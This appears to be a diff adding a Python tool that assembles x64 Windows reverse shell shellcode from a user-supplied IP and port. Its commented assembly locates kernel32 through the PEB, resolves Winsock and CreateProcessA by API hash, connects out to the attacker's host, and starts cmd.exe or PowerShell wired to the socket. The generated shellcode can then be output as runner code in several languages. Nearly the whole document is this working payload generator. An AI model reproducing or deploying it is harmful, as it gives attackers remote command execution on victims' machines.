+	parser.add_argument('--language', '-l', required=False, default='python', dest='lan',help='The language of desired shellcode runner, default language is python. Support c, csharp, python, powershell')
+	parser.add_argument('--variable', '-v', required=False, default='buf', dest='var',help='The variable name of shellcode array, default variable is buf')
+	parser.add_argument('--type', '-t', required=False, default='cmd', dest='shell_type',help='The shell type, Powershell or Cmd, default shell is cmd')
+	parser.add_argument('--save', '-s', required=False, default='False', dest='save',help='Whether to save the generated shellcode to a bin file, True/False')
+	parser.add_argument('--output', '-o', required=False, default='', dest='output',help='If choose to save the shellcode to file, the desired location.')
+
+	args = parser.parse_args()
+	ip=args.ip
+	port=int(args.port)
+	lan=args.lan.lower()
+	var=args.var
+	shell_type=args.shell_type.lower()
+	save=args.save.lower()
+	output=args.output
+	print("[+]Shellcode Settings:")
+	print("******** IP Address: "+ip)
+	print("******** Listening Port: "+str(port))
+	print("******** Language of desired shellcode runner: "+lan)
+	print("******** Shellcode array variable name: "+var)
+	print("******** Shell: "+shell_type)
+	print("******** Save Shellcode to file: "+save+"\n\n")
+
+	args = parser.parse_args()
+	port_argument = get_port_argument(port)
+	ip_argument = get_ip_argument(ip)
+	shell_type = get_shell_type_argument(shell_type)
+
+	CODE = (
+"find_kernel32:"
+" xor rdx, rdx;"
+" mov rax, gs:[rdx+0x60];"        # RAX stores the value of ProcessEnvironmentBlock member in TEB, which is the PEB address
+" mov rsi,[rax+0x18];"        # Get the value of the LDR member in PEB, which is the address of the _PEB_LDR_DATA structure
+" mov rsi,[rsi + 0x30];"        # RSI is the address of the InInitializationOrderModuleList member in the _PEB_LDR_DATA structure
+" mov r9, [rsi];"        # Current module is python.exe
+" mov r9, [r9];"        # Current module is ntdll.dll
+" mov r9, [r9+0x10];"        # Current module is kernel32.dll
+" jmp jump_section;"
+
+"parse_module:"        # Parsing DLL file in memory
+" mov ecx, dword ptr [r9 + 0x3c];"        # R9 stores the base address of the module, get the NT header offset
+" xor r15, r15;"
+" mov r15b, 0x88;"	# Offset to Export Directory
+" add r15, r9;"
+" add r15, rcx;"
+" mov r15d, dword ptr [r15];"        # Get the RVA of the export directory
+" add r15, r9;"        # R14 stores  the VMA of the export directory
+" mov ecx, dword ptr [r15 + 0x18];"        # ECX stores the number of function names as an index value
+" mov r14d, dword ptr [r15 + 0x20];"        # Get the RVA of ENPT
+" add r14, r9;"        # R14 stores  the VMA of ENPT
+
+"search_function:"        # Search for a given function
+" jrcxz not_found;"        # If RCX is 0, the given function is not found
+" dec ecx;"        # Decrease index by 1
+" xor rsi, rsi;"
+" mov esi, [r14 + rcx*4];"        # RVA of function name string
+" add rsi, r9;"        # RSI points to function name string
+
+"function_hashing:"        # Hash function name function
+" xor rax, rax;"
+" xor rdx, rdx;"
+" cld;"        # Clear DF flag
+
+"iteration:"        # Iterate over each byte
+" lodsb;"        # Copy the next byte of RSI to Al
+" test al, al;"        # If reaching the end of the string
+" jz compare_hash;"        # Compare hash
+" ror edx, 0x0d;"        # Part of hash algorithm
+" add edx, eax;"        # Part of hash algorithm
+" jmp iteration;"        # Next byte
+
+"compare_hash:"        # Compare hash
+" cmp edx, r8d;"
+" jnz search_function;"        # If not equal, search the previous function (index decreases)
+" mov r10d, [r15 + 0x24];"        # Ordinal table RVA
+" add r10, r9;"        # Ordinal table VMA
+" movzx ecx, word ptr [r10 + 2*rcx];"        # Ordinal value -1
+" mov r11d, [r15 + 0x1c];"        # RVA of EAT
+" add r11, r9;"        # VMA of EAT
+" mov eax, [r11 + 4*rcx];"        # RAX stores RVA of the function
+" add rax, r9;"        # RAX stores  VMA of the function
+" ret;"
+"not_found:"
+" ret;"
+
+"jump_section:"        # Achieve PIC and elminiate 0x00 byte
+" mov rbp, r9;"        # RBP stores base address of Kernel32.dll
+" mov r8d, 0xec0e4e8e;"        # LoadLibraryA Hash
+" call parse_module;"        # Search LoadLibraryA's address
+" mov r12, rax;"        # R12 stores the address of LoadLibraryA function
+
+"load_module:"
+" xor rax, rax;"
+" mov ax, 0x6c6c;"        # Save the string "ll" to RAX
+" push rax;"        # Push the string to the stack
+" mov rax, 0x642E32335F325357;"        # Save the string "WS2_32.D" to RAX
+" push rax;"        # Push the string to the stack
+" mov rcx, rsp;"        # RCX points to the "WS2_32.dll" string
+" sub rsp, 0x20;"        # Function prologue
+" mov rax, r12;"        # RAX stores address of LoadLibraryA function
+" call rax;"        # LoadLibraryA("ws2_32.dll")
+" add rsp, 0x20;"        # Function epilogue
+" mov r14, rax;"        # R14 stores the base address of ws2_32.dll
+
+"call_wsastartup:"
+" mov r9, rax;"        # R9 stores the base address of ws2_32.dll
+" mov r8d, 0x3bfcedcb;"        # Hash of WSAStartup
+" mov rbx, r9;"        # Save the base address of ws2_32.dll to RBX for later use
+" call parse_module;"        # Search for and get the address of WSAStartup
+" xor rcx, rcx;"
+" mov cx, 0x198;"
+" sub rsp, rcx;"        # Reserve enough space for the lpWSDATA structure
+" lea rdx, [rsp];"        # Assign the address of lpWSAData to the RDX register as the 2nd parameter
+" mov cx, 0x202;"        # Assign 0x202 to wVersionRequired and store it in RCX as the 1st parameter
+" sub rsp, 0x30;"        # Function prologue
+" call rax;"        # Call WSAStartup
+" add rsp, 0x30;"        # Function epilogue
+
+"call_wsasocket:"
+" mov r9, rbx;"
+" mov r8d, 0xadf509d9;"        # Hash of WSASocketA function
+" call parse_module;"        # Get the address of WSASocketA function
+" sub rsp, 0x30;"        # Function prologue
+" xor rcx, rcx;"
+" mov cl, 2;"        # AF is 2 as the 1st parameter
+" xor rdx, rdx;"
+" mov dl, 1;"        # Type is 1 as the 2nd parameter
+" xor r8, r8;"
+" mov r8b, 6;"        # Protocol is 6 as the 3rd parameter
+" xor r9, r9;"        # lpProtocolInfo is 0 as the 4th parameter
+" mov [rsp+0x20], r9;"        # g is 0 as the 5th parameter, stored on the stack
+" mov [rsp+0x28], r9;"        # dwFlags is 0 as the 6th parameter, stored on the stack
+" call rax;"        # Call WSASocketA function
+" mov r12, rax;"        # Save the returned socket type return value in R12 to prevent data loss in RAX
+" add rsp, 0x30;"        # Function epilogue
+
+"call_wsaconnect:"
+" mov r9, rbx;"
+" mov r8d, 0xb32dba0c;"        # Hash of WSAConnect
+" call parse_module;"        # Get the address of WSAConnect
+" sub rsp, 0x20;"        # Allocate enough space for the socketaddr structure
+" mov rcx, r12;"        # Pass the socket descriptor returned by WSASocketA to RCX as the 1st parameter
+" xor rdx, rdx;"
+" mov dl, 2;"        # Set sin_family to AF_INET (=2)
+" mov [rsp], rdx;"        # Store the socketaddr structure
+" xor rdx, rdx;"
+f"{port_argument}"	# Set local port dynamically
+" mov [rsp+2], rdx;"        # Pass the port value to the corresponding position in the socketaddr structure
+f"{ip_argument}"
+" mov [rsp+4], rdx;"        # Pass IP to the corresponding position in the socketaddr structure
+# " xor r8, r8;"
+# " mov [rsp+8], r8;"        # Set zero for sin_zero. Comment these 2 lines to save more bytes, does not prevent the shellcode from working
+" lea rdx, [rsp];"        # Pointer to the socketaddr structure as the 2nd parameter
+" xor r8, r8;"
+" mov r8b, 0x16;"        # Set namelen member to 0x16
+" xor r9, r9;"        # lpCallerData is 0 as the 4th parameter
+" sub rsp, 0x38;"        # Function prologue
+" mov [rsp+0x20], r9;"        # lpCalleeData is 0 as the 5th parameter
+" mov [rsp+0x28], r9;"        # lpSQOS is 0 as the 6th parameter
+" mov [rsp+0x30], r9;"        # lpGQOS is 0 as the 7th parameter
+" call rax;"        # Call WSAConnect
+" add rsp, 0x38;"        # Function epilogue
+
+"call_createprocess:"
+" mov r9, rbp;"        # R9 stores the base address of Kernel32.dll
+" mov r8d, 0x16b3fe72;"        # Hash of CreateProcessA
+" call parse_module;"        # Get the address of CreateProcessA
+f"{shell_type}"
+" push rdx;"
+" mov rdx, rsp;"        # Pointer to "cmd.exe" is stored in the RCX register
+" push r12;"        # The member STDERROR is the return value of WSASocketA
+" push r12;"        # The member STDOUTPUT is the return value of WSASocketA
+" push r12;"        # The member STDINPUT is the return value of WSASocketA
+" xor rcx, rcx;"
+" push cx;"        # Pad with 0x00 before pushing the dwFlags member, only the total size matters
+" push rcx;"
+" push rcx;"
+" mov cl, 0xff;"
+" inc cx;"        # 0xff+1=0x100
+" push cx;"        # dwFlags=0x100
+" xor rcx, rcx;"
+" push cx;"        # Pad with 0 before pushing the cb member, only the total size matters
+" push cx;"
+" push rcx;"
+" push rcx;"
+" push rcx;"
+" push rcx;"
+" push rcx;"
+" push rcx;"
+" mov cl, 0x68;"
+" push rcx;"        # cb=0x68
+" mov rdi, rsp;"        # Pointer to STARTINFOA structure
+" mov rcx, rsp;"
+" sub rcx, 0x20;"        # Reserve enough space for the ProcessInformation structure
+" push rcx;"        # Address of the ProcessInformation structure as the 10th parameter
+" push rdi;"        # Address of the STARTINFOA structure as the 9th parameter
+" xor rcx, rcx;"
+" push rcx;"        # Value of lpCurrentDirectory is 0 as the 8th parameter
+" push rcx;"        # lpEnvironment=0 as the 7th argument
+" push rcx;"        # dwCreationFlags=0 as the 6th argument
+" inc rcx;"
+" push rcx;"        # Value of bInheritHandles is 1 as the 5th parameter
+" dec cl;"
+" push rcx;"        # Reserve space for the function return area (4th parameter)
+" push rcx;"        # Reserve space for the function return area (3rd parameter)
+" push rcx;"        # Reserve space for the function return area (2nd parameter)
+" push rcx;"        # Reserve space for the function return area (1st parameter)
+" mov r8, rcx;"        # lpProcessAttributes value is 0 as the 3rd parameter
+" mov r9, rcx;"        # lpThreatAttributes value is 0 as the 4th parameter
+" call rax;"        # Call CreateProcessA
+)
+
+	ks = Ks(KS_ARCH_X86, KS_MODE_64)
+	encoding, count = ks.asm(CODE)
+	output_shellcode(lan,encoding,var,save)